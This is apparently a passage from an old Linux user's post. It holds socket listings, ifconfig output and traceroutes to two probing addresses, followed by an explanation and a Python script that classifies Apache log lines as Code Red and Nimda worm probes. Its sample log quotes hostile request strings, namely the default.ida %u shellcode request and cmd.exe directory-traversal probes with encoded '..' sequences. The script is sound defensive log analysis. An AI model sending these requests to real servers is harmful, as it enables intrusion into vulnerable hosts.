/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2049
unix 3 [ ] STREAM VERBUNDEN 2036
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2035
unix 3 [ ] STREAM VERBUNDEN 2030
unix 3 [ ] STREAM VERBUNDEN 2029
unix 3 [ ] STREAM VERBUNDEN 1965 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1964
unix 3 [ ] STREAM VERBUNDEN 1945 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1944
unix 3 [ ] STREAM VERBUNDEN 1773 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1772
unix 3 [ ] STREAM VERBUNDEN 1749
/tmp/.font-unix/fs7110
unix 3 [ ] STREAM VERBUNDEN 1748
unix 3 [ ] STREAM VERBUNDEN 1751 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1745
unix 2 [ ] DGRAM 408
unix 2 [ ] DGRAM 210
======== one more traceroute 30 min later
ppp0 Protokoll:Punkt-zu-Punkt Verbindung
inet Adresse:213.218.5.200 P-z-P:195.2.163.147
Maske:255.255.255.255
UP PUNKTZUPUNKT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:4 errors:2 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:3
RX bytes:192 (192.0 b) TX bytes:138 (138.0 b)
======= traceroute 213.157.182.3 (the address first appearing in the log):
1 pm3-fr2.toplink-plannet.de (195.2.163.147) 124.134 ms 119.642 ms
129.957 ms
2 a391c.fe0-0-2.frances.fre1.toplink-plan.net (195.2.163.145) 109.935 ms
129.849 ms 119.954 ms
3 bca1e.ser6-0.susan.stu1.toplink-plan.net (195.2.188.161) 129.967 ms
129.879 ms 119.952 ms
4 c032e.ser6-0.kay.kar1.toplink-plan.net (212.126.192.50) 129.965 ms
139.856 ms 119.952 ms
5 c893c.bbo1.elena.kar1.toplink-plan.net (212.126.200.147) 119.978 ms
139.876 ms 119.952 ms
6 1e11c.bbo4.franca.fra3.toplink-plan.net (213.218.30.17) 129.980 ms
149.866 ms 139.961 ms
7 fra2-br1-fe0-0.rdsnet.ro (80.81.192.87) 129.967 ms 119.881 ms 129.958
ms
8 fra2-cr1-atm2-210.rdsnet.ro (62.231.127.65) 139.961 ms 119.877 ms
119.958 ms
9 buh1-gsr1-p6-0.rdsnet.ro (193.231.252.233) 149.966 ms 149.852 ms
149.959 ms
10 buh1-htb-ge0.rdsnet.ro (62.231.74.30) 159.975 ms 159.870 ms 179.971 ms
11 buh1-cr1-vlan4.rdsnet.ro (193.231.252.73) 169.940 ms 149.873 ms 149.957
ms
12 buh1-gw3-fe0-0.rdsnet.ro (193.231.184.154) 159.961 ms 159.863 ms
169.959 ms
13 213.157.182.3 (213.157.182.3) 179.973 ms 199.847 ms 219.961 ms
======= traceroute 213.37.21.54 (the 'main' accessing address):
1 pm3-fr2.toplink-plannet.de (195.2.163.147) 131.377 ms 109.652 ms
120.023 ms
2 a391c.fe0-0-2.frances.fre1.toplink-plan.net (195.2.163.145) 119.864 ms
109.876 ms 119.956 ms
3 bca1e.ser6-0.susan.stu1.toplink-plan.net (195.2.188.161) 119.958 ms
109.864 ms 119.957 ms
4 c032e.ser6-0.kay.kar1.toplink-plan.net (212.126.192.50) 119.953 ms
109.875 ms 129.923 ms
5 c892c.bbo1.carmen.kar1.toplink-plan.net (212.126.200.146) 129.965 ms
119.849 ms 119.964 ms
6 1e11c.bbo4.franca.fra3.toplink-plan.net (213.218.30.17) 129.961 ms
129.876 ms 149.931 ms
7 24e9d.1.level3.ups.fra3.toplink-plan.net (62.67.36.233) 139.982 ms
139.809 ms 139.955 ms
8 ae0-55.mp1.Frankfurt1.Level3.net (195.122.136.97) 129.966 ms 129.876 ms
139.969 ms
9 so-0-0-0.mp1.London2.Level3.net (212.187.128.61) 139.950 ms 149.791 ms
149.951 ms
10 so-1-0-0.bbr1.Washington1.level3.net (212.187.128.138) 219.979 ms
229.937 ms 209.878 ms
11 so-6-0-0.edge1.Washington1.Level3.net (209.244.11.10) 219.930 ms 229.847
ms 209.928 ms
12 65.59.88.210 (65.59.88.210) 219.934 ms 209.635 ms 209.977 ms
13 if-6-0.core1.Ashburn.Teleglobe.net (207.45.223.113) 209.906 ms 209.821
ms 209.926 ms
14 if-2-0.core2.Newark.Teleglobe.net (64.86.83.213) 219.931 ms 219.844 ms
239.882 ms
15 if-8-0.core2.London2.Teleglobe.net (66.110.8.142) 310.012 ms 309.913 ms
299.833 ms
16 if-5-0.core1.London2.teleglobe.net (195.219.15.217) 310.001 ms 289.802
ms 299.970 ms
17 if-5-0.core1.Madrid.Teleglobe.net (195.219.133.61) 329.906 ms 329.867 ms
329.963 ms
18 if-6-0.core2.Madrid.Teleglobe.net (195.219.149.77) 339.945 ms 329.857 ms
330.040 ms
19 * * *
20 10.127.1.26 (10.127.1.26) 330.038 ms 319.823 ms 329.904 ms
21 62.100.101.6 (62.100.101.6) 329.987 ms 319.843 ms 329.973 ms
22 10.21.2.100 (10.21.2.100) 329.962 ms 319.890 ms 339.985 ms
23 10.42.211.2 (10.42.211.2) 329.941 ms 329.896 ms 329.989 ms
24 * * * (before here was 213.37.21.54)
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * * (ping doesn't reach it either)
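The request paths in the access log above are the classic probes of the Code Red worm (`default.ida` followed by a `%u`-encoded payload) and the Nimda worm (`root.exe` and `cmd.exe?/c+dir` behind encoded `..\` traversal), which scan every public IP on port 80 regardless of what is listening; an IIS-specific request against Apache on Debian simply gets a 404. The Python below is an added example, not part of the original post: it parses Apache common-log lines, flags these probe families per client, and counts how many probes were actually served, run here over a constructed sample modelled on the quoted entries.

```python
import re
from collections import Counter

# Constructed sample, modelled on the access log quoted in the post
# (mail-client line wrapping undone, long query strings shortened).
SAMPLE_LOG = """\
127.0.0.1 - - [09/Jul/2003:22:56:32 +0200] "GET /index.html HTTP/1.0" 200 4120 "-" "Mozilla/5.0 Galeon/1.2.6"
213.157.182.3 - - [10/Jul/2003:00:21:44 +0200] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090=a HTTP/1.0" 404 303 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:12 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:17 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:35 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:05 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:25 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
"""

# Apache common/combined log format: client, ident, user, [timestamp],
# "METHOD path protocol", status, size (referer/agent ignored here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Encoded forms of "..\" or "../" that IIS of the time decoded after its
# path check; all of them appear in the quoted log.
TRAVERSAL_ENCODINGS = {
    "%255c": "double-encoded backslash",
    "%5c": "URL-encoded backslash",
    "%c1%1c": "overlong UTF-8 slash",
    "%c0%af": "overlong UTF-8 slash",
    "%c0%2f": "overlong UTF-8 slash",
}


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_path(path):
    """Label a request path with the worm-probe families it matches."""
    low = path.lower()
    labels = []
    if re.match(r"^/default\.ida\?x+%u", low):      # Code Red: .ida overflow + %u shellcode
        labels.append("code-red")
    if "/root.exe?" in low:                          # backdoor copy of cmd.exe probed by Nimda
        labels.append("root.exe-backdoor-probe")
    if "cmd.exe?/c+" in low:                         # direct cmd.exe invocation attempt
        labels.append("cmd.exe-probe")
    for enc in TRAVERSAL_ENCODINGS:
        if ".." + enc in low:
            labels.append("traversal:" + enc)
    return labels


def scan_log(text):
    """Parse every line and attach its probe labels (empty list = ordinary request)."""
    records = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rec["labels"] = classify_path(rec["path"])
        records.append(rec)
    return records


def summarize(records):
    """Per probing client: probe count, how many were served (status < 400), label counts."""
    summary = {}
    for rec in records:
        if not rec["labels"]:
            continue
        entry = summary.setdefault(rec["ip"], {"probes": 0, "served": 0, "labels": Counter()})
        entry["probes"] += 1
        entry["labels"].update(rec["labels"])
        if rec["status"] < 400:
            entry["served"] += 1
    return summary


if __name__ == "__main__":
    for ip, info in summarize(scan_log(SAMPLE_LOG)).items():
        print(f"{ip}: {info['probes']} probe(s), {info['served']} served, kinds={dict(info['labels'])}")
```

A `served` count of zero for a probing client, as in this sample, confirms the requests were rejected; the same probe answered with a 200 by a Windows/IIS host is the line that would need escalating.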